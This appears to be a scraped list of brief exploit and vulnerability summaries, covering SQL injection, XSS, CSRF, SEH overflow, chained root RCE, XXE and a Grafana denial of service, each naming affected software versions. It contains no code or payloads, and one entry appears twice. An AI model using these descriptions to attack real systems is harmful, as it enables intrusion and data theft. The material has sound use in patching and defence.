The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
This exploit takes advantage of a vulnerability in the Move Networks Quantum Streaming Player, allowing an attacker to overwrite the Structured Exception Handler (SEH) and execute arbitrary code. The exploit is written in JavaScript and uses shellcode to execute the 'calc.exe' program on a Windows XP SP2 system. The shellcode is limited to around 400 bytes.
Unauthenticated user can perform SQL Injection to bypass the login mechanism on /admin/checklogin.php in the Online Polling System 1.0. The vulnerability is due to the lack of proper input validation on the 'myusername' and 'mypassword' parameters. An attacker can exploit this vulnerability to gain unauthorized access to the administration control panel.
The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
This module exploits multiple vulnerabilities together in order to achieve a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user. The specific flaw exists within the LogSettingHandler class of administrator interface software. When parsing the mount_device parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability. Another specific flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this vulnerability in order to communicate with internal services in the product. Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the IWSS user. Due to the combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. Version prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
The Savsoft Quiz 5 application is vulnerable to persistent cross-site scripting (XSS) attacks. The vulnerability exists in the insert_user_2 function, where user input is not properly sanitized before being stored in the database. An attacker can exploit this vulnerability by injecting malicious scripts into the 'custom' parameter during user registration. When the injected script is executed, it can steal sensitive information, perform actions on behalf of the user, or deface the website.
Powie's WHOIS Wordpress plugin was found to be vulnerable to Stored XSS as multiple fields in the plugin's setup settings fail to properly sanitize user input. The risk here is mitigated due to the fact that active exploitation would require authentication. However a lower privileged Wordpress user would be able to take advantage of the fact that the arbitrary Javascript executes on the same origin and therefore by using a specially crafted payload, an attacker would be able to elevate their privileges or take any of the same actions an admin would be able to. All Wordpress websites using Powie's WHOIS version < 0.9.31 are vulnerable.
The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
Windows mshta.exe allows processing of XML External Entities, resulting in local data theft and program reconnaissance upon opening specially crafted HTA files. The exploit leverages XML injection targeting the mshta.exe HTA file type, providing stealthy data theft with recon capabilities.
This script exploits a Denial of Service vulnerability in Grafana version 7.0.1. By sending a specially crafted request to the target, it causes the Grafana server to crash or become unresponsive, resulting in a denial of service condition.
Services By CQR